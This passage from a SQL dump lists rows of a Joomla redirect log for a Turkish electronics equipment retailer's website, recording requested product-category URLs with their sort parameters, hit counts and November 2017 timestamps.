10:33:24','0000-00-00 00:00:00',301),(9263,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,mf_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-11-06 10:33:59','0000-00-00 00:00:00',301),(9264,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'http://3s-technologies.com.tr/components/com_virtuemart/assets/css/chosen.css?vmver=bbde3199','',81,0,'2017-11-06 10:35:58','0000-00-00 00:00:00',301),(9265,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name/results,1-20',NULL,'','',1,0,'2017-11-06 10:42:21','0000-00-00 00:00:00',301),(9266,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,`p`.product_sku?language=en-gb',NULL,'','',7,0,'2017-11-06 10:57:34','0000-00-00 00:00:00',301),(9267,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-06 11:05:46','0000-00-00 00:00:00',301),(9268,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,category_name?language=tr-tr',NULL,'','',14,0,'2017-11-06 11:11:30','0000-00-00 00:00:00',301),(9269,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,ordering?error=404&language=en-gb',NULL,'','',1,0,'2017-11-06 11:11:58','0000-00-00 00:00:00',301),(9270,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=49&itemid=61&lang=en&format=feed&type=atom',NULL,'','',1,0,'2017-11-06 11:17:30','0000-00-00 00:00:00',301),(9271,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer?language=tr-tr',NULL,'','',8,0,'2017-11-06 11:24:32','0000-00-00 00:00:00',301),(9272,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',260,0,'2017-11-06 11:26:09','0000-00-00 00:00:00',301),(9273,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın',NULL,'','',510,0,'2017-11-06 11:26:16','0000-00-00 00:00:00',301),(9274,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku',NULL,'','',513,0,'2017-11-06 11:26:20','0000-00-00 00:00:00',301),(9275,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',509,0,'2017-11-06 11:26:22','0000-00-00 00:00:00',301),(9276,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,mf_name',NULL,'','',494,0,'2017-11-06 11:26:36','0000-00-00 00:00:00',301),(9277,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,mf_name/dirdesc',NULL,'','',498,0,'2017-11-06 11:26:39','0000-00-00 00:00:00',301),(9278,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,ordering',NULL,'','',506,0,'2017-11-06 11:26:49','0000-00-00 00:00:00',301),(9279,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,product_name',NULL,'','',503,0,'2017-11-06 11:27:38','0000-00-00 00:00:00',301),(9280,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,product_name/dirdesc',NULL,'','',507,0,'2017-11-06 11:27:58','0000-00-00 00:00:00',301),(9281,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/dirdesc',NULL,'','',501,0,'2017-11-06 11:28:15','0000-00-00 00:00:00',301),(9282,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-06 11:28:25','0000-00-00 00:00:00',301),(9283,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-06 11:28:29','0000-00-00 00:00:00',301),(9284,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,category_name',NULL,'','',511,0,'2017-11-06 11:28:52','0000-00-00 00:00:00',301),(9285,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-06 11:29:07','0000-00-00 00:00:00',301),(9286,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',513,0,'2017-11-06 11:29:08','0000-00-00 00:00:00',301),(9287,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,product_sku',NULL,'','',508,0,'2017-11-06 11:29:17','0000-00-00 00:00:00',301),(9288,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/cm-602-l-detail',NULL,'','',255,0,'2017-11-06 11:29:24','0000-00-00 00:00:00',301),(9289,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/dirdesc',NULL,'','',510,0,'2017-11-06 11:29:35','0000-00-00 00:00:00',301),(9290,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/mx200lp-3-detail',NULL,'','',258,0,'2017-11-06 11:29:49','0000-00-00 00:00:00',301),(9291,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,product_sku',NULL,'','',253,0,'2017-11-06 11:29:55','0000-00-00 00:00:00',301),(9292,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/av132-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-06 11:36:41','0000-00-00 00:00:00',301),(9293,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',48,0,'2017-11-06 11:37:41','0000-00-00 00:00:00',301),(9294,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-41-detail',NULL,'','',25,0,'2017-11-06 11:40:30','0000-00-00 00:00:00',301),(9295,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/lfs-1-detail',NULL,'https://www.google.com.tr/','',68,0,'2017-11-06 11:41:22','0000-00-00 00:00:00',301),(9296,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/lfs-1-detail',NULL,'https://www.google.com.tr/','',50,0,'2017-11-06 11:41:26','0000-00-00 00:00:00',301),(9297,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı',NULL,'','',434,0,'2017-11-06 11:44:48','0000-00-00 00:00:00',301),(9298,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/gf-12-hc-ht-detail',NULL,'http://www.3s-technologies.com.tr/tr/urunler/smd-f%C4%B1r%C4%B1n','',241,0,'2017-11-06 11:45:29','0000-00-00 00:00:00',301),(9299,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content\'a=0&view=article&id=53&itemid=76&lang=tr',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content\'A=0&view=article&id=53&Itemid=76&lang=tr','',13,0,'2017-11-06 11:47:32','0000-00-00 00:00:00',301),(9300,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article\'a=0&id=53&itemid=76&lang=tr',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article\'A=0&id=53&Itemid=76&lang=tr','',13,0,'2017-11-06 11:47:33','0000-00-00 00:00:00',301),(9301,'http://www.3s-technologies.com.tr/en/products/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',37,0,'2017-11-06 11:57:19','0000-00-00 00:00:00',301),(9302,'http://www.3s-technologies.com.tr/index.php/en/products/lfs-1-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-06 11:58:26','0000-00-00 00:00:00',301),(9303,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',3,0,'2017-11-06 11:59:52','0000-00-00 00:00:00',301),(9304,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,product_name?language=en-gb',NULL,'','',13,0,'2017-11-06 12:03:55','0000-00-00 00:00:00',301),(9305,'http://www.3s-technologies.com.tr/tr/login-form',NULL,'','',24,0,'2017-11-06 12:13:54','0000-00-00 00:00:00',301),(9306,'http://www.3s-technologies.com.tr/tr/login',NULL,'','',119,0,'2017-11-06 12:13:56','0000-00-00 00:00:00',301),(9307,'http://www.3s-technologies.com.tr/tr/register',NULL,'','',25,0,'2017-11-06 12:13:58','0000-00-00 00:00:00',301),(9308,'http://www.3s-technologies.com.tr/tr/log-out.html',NULL,'','',31,0,'2017-11-06 12:14:00','0000-00-00 00:00:00',301),(9309,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/asp-300-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-06 12:14:45','0000-00-00 00:00:00',301),(9310,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,ordering?language=tr-tr',NULL,'','',26,0,'2017-11-06 12:16:01','0000-00-00 00:00:00',301),(9311,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın',NULL,'','',383,0,'2017-11-06 12:21:45','0000-00-00 00:00:00',301),(9312,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-detail',NULL,'','',25,0,'2017-11-06 12:52:37','0000-00-00 00:00:00',301),(9313,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',47,0,'2017-11-06 12:53:19','0000-00-00 00:00:00',301),(9314,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/rh2-detail',NULL,'','',55,0,'2017-11-06 13:11:54','0000-00-00 00:00:00',301),(9315,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/cs40-detail',NULL,'','',216,0,'2017-11-06 13:13:37','0000-00-00 00:00:00',301),(9316,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc?error=404&language=en-gb',NULL,'','',3,0,'2017-11-06 13:27:27','0000-00-00 00:00:00',301),(9317,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,product_name',NULL,'','',588,0,'2017-11-06 13:28:09','0000-00-00 00:00:00',301),(9318,'http://www.3s-technologies.com.tr/tr/ueruenler/manufacturers/tolo',NULL,'','',2,0,'2017-11-06 13:28:49','0000-00-00 00:00:00',301),(9319,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,product_name?language=en-gb',NULL,'','',24,0,'2017-11-06 13:30:11','0000-00-00 00:00:00',301),(9320,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,ordering?language=tr-tr',NULL,'','',8,0,'2017-11-06 13:30:53','0000-00-00 00:00:00',301),(9321,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/dirdesc?language=tr-tr',NULL,'','',26,0,'2017-11-06 13:32:58','0000-00-00 00:00:00',301),(9322,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name?language=tr-tr',NULL,'','',2,0,'2017-11-06 13:34:36','0000-00-00 00:00:00',301),(9323,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',516,0,'2017-11-06 13:38:18','0000-00-00 00:00:00',301),(9324,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',518,0,'2017-11-06 13:38:28','0000-00-00 00:00:00',301),(9325,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',513,0,'2017-11-06 13:38:37','0000-00-00 00:00:00',301),(9326,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',522,0,'2017-11-06 13:39:02','0000-00-00 00:00:00',301),(9327,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',528,0,'2017-11-06 13:39:10','0000-00-00 00:00:00',301),(9328,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',521,0,'2017-11-06 13:39:37','0000-00-00 00:00:00',301),(9329,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',526,0,'2017-11-06 13:39:49','0000-00-00 00:00:00',301),(9330,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',517,0,'2017-11-06 13:40:21','0000-00-00 00:00:00',301),(9331,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',516,0,'2017-11-06 13:40:37','0000-00-00 00:00:00',301),(9332,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-06 13:40:59','0000-00-00 00:00:00',301),(9333,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',513,0,'2017-11-06 13:41:13','0000-00-00 00:00:00',301),(9334,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',513,0,'2017-11-06 13:41:32','0000-00-00 00:00:00',301),(9335,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız',NULL,'','',509,0,'2017-11-06 13:41:55','0000-00-00 00:00:00',301),(9336,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',517,0,'2017-11-06 13:42:03','0000-00-00 00:00:00',301),(9337,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',515,0,'2017-11-06 13:42:13','0000-00-00 00:00:00',301),(9338,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',515,0,'2017-11-06 13:42:21','0000-00-00 00:00:00',301),(9339,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-11-06 13:42:59','0000-00-00 00:00:00',301),(9340,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name',NULL,'','',512,0,'2017-11-06 13:43:13','0000-00-00 00:00:00',301),(9341,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',520,0,'2017-11-06 13:43:20','0000-00-00 00:00:00',301),(9342,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,product_sku',NULL,'','',505,0,'2017-11-06 13:43:49','0000-00-00 00:00:00',301),(9343,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',10,0,'2017-11-06 13:47:24','0000-00-00 00:00:00',301),(9344,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/cm-602-l-detail',NULL,'','',79,0,'2017-11-06 13:48:17','0000-00-00 00:00:00',301),(9345,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/jv131-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-06 14:38:46','0000-00-00 00:00:00',301),(9346,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',575,0,'2017-11-06 14:39:59','0000-00-00 00:00:00',301),(9347,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-06 14:40:05','0000-00-00 00:00:00',301),(9348,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',565,0,'2017-11-06 14:40:06','0000-00-00 00:00:00',301),(9349,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',571,0,'2017-11-06 14:40:10','0000-00-00 00:00:00',301),(9350,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',582,0,'2017-11-06 14:40:11','0000-00-00 00:00:00',301),(9351,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',581,0,'2017-11-06 14:40:16','0000-00-00 00:00:00',301),(9352,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',581,0,'2017-11-06 14:40:18','0000-00-00 00:00:00',301),(9353,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',573,0,'2017-11-06 14:40:23','0000-00-00 00:00:00',301),(9354,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',569,0,'2017-11-06 14:40:26','0000-00-00 00:00:00',301),(9355,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı?language=en-gb',NULL,'','',1,0,'2017-11-06 14:40:29','0000-00-00 00:00:00',301),(9356,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız',NULL,'','',563,0,'2017-11-06 14:40:31','0000-00-00 00:00:00',301),(9357,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',571,0,'2017-11-06 14:40:35','0000-00-00 00:00:00',301),(9358,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',573,0,'2017-11-06 14:40:36','0000-00-00 00:00:00',301),(9359,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',565,0,'2017-11-06 14:40:42','0000-00-00 00:00:00',301),(9360,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',561,0,'2017-11-06 14:40:43','0000-00-00 00:00:00',301),(9361,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',564,0,'2017-11-06 14:40:47','0000-00-00 00:00:00',301),(9362,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',560,0,'2017-11-06 14:40:48','0000-00-00 00:00:00',301),(9363,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',555,0,'2017-11-06 14:40:53','0000-00-00 00:00:00',301),(9364,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',554,0,'2017-11-06 14:40:55','0000-00-00 00:00:00',301),(9365,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',555,0,'2017-11-06 14:40:57','0000-00-00 00:00:00',301),(9366,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',558,0,'2017-11-06 14:41:02','0000-00-00 00:00:00',301),(9367,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content\'a=0&view=article&id=50&itemid=66&lang=tr',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content\'A=0&view=article&id=50&Itemid=66&lang=tr','',12,0,'2017-11-06 14:41:04','0000-00-00 00:00:00',301),(9368,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',556,0,'2017-11-06 14:41:04','0000-00-00 00:00:00',301),(9369,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article\'a=0&id=50&itemid=66&lang=tr',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article\'A=0&id=50&Itemid=66&lang=tr','',10,0,'2017-11-06 14:41:05','0000-00-00 00:00:00',301),(9370,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',553,0,'2017-11-06 14:41:16','0000-00-00 00:00:00',301),(9371,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',553,0,'2017-11-06 14:41:21','0000-00-00 00:00:00',301),(9372,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,category_name/dirdesc',NULL,'','',558,0,'2017-11-06 14:41:24','0000-00-00 00:00:00',301),(9373,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,pc.ordering,product_name',NULL,'','',553,0,'2017-11-06 14:41:30','0000-00-00 00:00:00',301),(9374,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,product_name',NULL,'','',556,0,'2017-11-06 14:41:33','0000-00-00 00:00:00',301),(9375,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',553,0,'2017-11-06 14:41:42','0000-00-00 00:00:00',301),(9376,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,mf_name',NULL,'','',558,0,'2017-11-06 14:41:46','0000-00-00 00:00:00',301),(9377,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',572,0,'2017-11-06 14:41:51','0000-00-00 00:00:00',301),(9378,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',566,0,'2017-11-06 14:41:52','0000-00-00 00:00:00',301),(9379,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,product_name',NULL,'','',567,0,'2017-11-06 14:41:57','0000-00-00 00:00:00',301),(9380,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',561,0,'2017-11-06 14:41:59','0000-00-00 00:00:00',301),(9381,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/dirdesc',NULL,'','',563,0,'2017-11-06 14:42:04','0000-00-00 00:00:00',301),(9382,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,`p`.product_sku',NULL,'','',566,0,'2017-11-06 14:42:09','0000-00-00 00:00:00',301),(9383,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',566,0,'2017-11-06 14:42:10','0000-00-00 00:00:00',301),(9384,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,mf_name',NULL,'','',565,0,'2017-11-06 14:42:17','0000-00-00 00:00:00',301),(9385,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',560,0,'2017-11-06 14:42:19','0000-00-00 00:00:00',301),(9386,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',558,0,'2017-11-06 14:42:24','0000-00-00 00:00:00',301),(9387,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',550,0,'2017-11-06 14:42:26','0000-00-00 00:00:00',301),(9388,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,product_name',NULL,'','',559,0,'2017-11-06 14:42:31','0000-00-00 00:00:00',301),(9389,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',558,0,'2017-11-06 14:42:32','0000-00-00 00:00:00',301),(9390,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',560,0,'2017-11-06 14:42:39','0000-00-00 00:00:00',301),(9391,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',565,0,'2017-11-06 14:42:47','0000-00-00 00:00:00',301),(9392,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',556,0,'2017-11-06 14:42:54','0000-00-00 00:00:00',301),(9393,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',557,0,'2017-11-06 14:42:56','0000-00-00 00:00:00',301),(9394,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name',NULL,'','',556,0,'2017-11-06 14:43:01','0000-00-00 00:00:00',301),(9395,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',569,0,'2017-11-06 14:43:03','0000-00-00 00:00:00',301),(9396,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name',NULL,'','',571,0,'2017-11-06 14:43:06','0000-00-00 00:00:00',301),(9397,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',562,0,'2017-11-06 14:43:08','0000-00-00 00:00:00',301),(9398,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,ordering',NULL,'','',567,0,'2017-11-06 14:43:13','0000-00-00 00:00:00',301),(9399,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/cs40-detail',NULL,'','',284,0,'2017-11-06 14:43:19','0000-00-00 00:00:00',301),(9400,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,category_name',NULL,'','',564,0,'2017-11-06 14:43:21','0000-00-00 00:00:00',301),(9401,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,mf_name',NULL,'','',561,0,'2017-11-06 14:43:23','0000-00-00 00:00:00',301),(9402,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,ordering',NULL,'','',558,0,'2017-11-06 14:43:25','0000-00-00 00:00:00',301),(9403,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_name',NULL,'','',555,0,'2017-11-06 14:43:26','0000-00-00 00:00:00',301),(9404,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_name/dirdesc',NULL,'','',559,0,'2017-11-06 14:43:28','0000-00-00 00:00:00',301),(9405,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_sku',NULL,'','',554,0,'2017-11-06 14:43:30','0000-00-00 00:00:00',301),(9406,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/dirdesc',NULL,'','',552,0,'2017-11-06 14:43:31','0000-00-00 